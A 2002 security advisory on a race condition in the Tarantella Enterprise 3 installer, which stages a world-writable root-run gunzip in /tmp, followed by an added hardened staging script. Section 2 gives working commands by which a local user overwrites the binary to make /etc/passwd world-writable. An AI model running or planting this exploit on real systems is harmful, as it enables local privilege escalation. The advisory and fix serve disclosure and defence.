Vapid Labs
Larry W. Cashdollar
1/14/2002

Vulnerability report for Tarantella Enterprise 3.

1. Local root compromise during installation:

The installation script provided with Tarantella handles utility packages during installation insecurely. A root-owned binary "gunzip" is created in /tmp with world-writable permissions; the pid is appended to the filename.

    TMP_GUNZIP=$TMPDIR/gunzip$$

    $ ls -l /tmp/gunzip16152
    -rwxrwxrwx    1 root     root        51808 Jan 14 00:15 gunzip16152

gunzip is extracted:

    extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
    extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE

The permissions of gunzip are changed to rwx for all:

    chmod 777 $TMP_GUNZIP >/dev/null 2>&1

The binary is used during installation:

    extract $efilename | $TMP_GUNZIP -q > "$efilename"

2. Exploit:

There is a race condition between when gunzip is extracted and when it is used during installation. During that window a malicious local user could inject code and compromise the system quickly.

    $ echo "#!/bin/sh" > /tmp/test.sh
    $ echo "chmod 777 /etc/passwd" >> /tmp/test.sh
    $ cat /tmp/test.sh > /tmp/gunzip16152

I was able to change the permissions of /etc/passwd to 777 by performing the above as an unprivileged user.

3. Recommendations:

Perhaps create a directory in /tmp or /var/tmp and use that directory as a work place?

    umask 077
    mkdir /tmp/workdir

4. Software:

Tarantella Enterprise 3
http://www.tarantella.com/download/e3/

Tested on Linux Debian 2.2
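A hardened version of the staging step suggested in section 3, as an added example that is not part of the advisory or of Tarantella's installer: the helper is written into a fresh, owner-only work directory under umask 077 and is never chmod 777, and a check refuses to run it if the file or its directory is a symlink, not owned by the caller, or group/other writable. The "extract gunzip" step is simulated with a constructed stub; mktemp, ls and cut are assumed to be available.

```shell
#!/bin/sh
# Added example (not Tarantella's installer script): stage an installer helper
# binary in a private, freshly created work directory instead of a world-writable
# file in /tmp. The "extract gunzip" step is simulated with a constructed stub.

# stage_helper NAME -> prints the path of the staged helper, or fails.
stage_helper() {
    name=$1
    # mktemp -d atomically creates an unpredictable, owner-only (0700) directory,
    # so another local user can neither pre-create it nor write into it.
    workdir=$(mktemp -d "${TMPDIR:-/tmp}/install.XXXXXX") || return 1
    target="$workdir/$name"
    # umask 077 in a subshell: the new file is owner-only from the moment it
    # exists; there is no window in which it is 777. The constructed stub
    # stands in for: extract gunzip > "$TMP_GUNZIP"
    ( umask 077 && printf '#!/bin/sh\nexec cat\n' > "$target" ) || return 1
    chmod 700 "$target" || return 1      # owner rwx only, never chmod 777
    printf '%s\n' "$target"
}

# check_staged PATH -> 0 if the helper and its directory are safe to execute:
# both owned by the caller, neither a symlink, neither group/other writable.
check_staged() {
    f=$1
    d=$(dirname "$f")
    for p in "$d" "$f"; do
        mode=$(ls -ld "$p" | cut -c1-10)        # e.g. drwx------ / -rwx------
        case $mode in
            l*)         return 1 ;;             # symlink: could point anywhere
            ?????w*)    return 1 ;;             # group-writable
            ????????w*) return 1 ;;             # other-writable
        esac
        [ -O "$p" ] || return 1                 # owned by the calling user
    done
    return 0
}
```

Run check_staged immediately before each use of the helper, not once at staging time, since the race in section 2 is between creation and use.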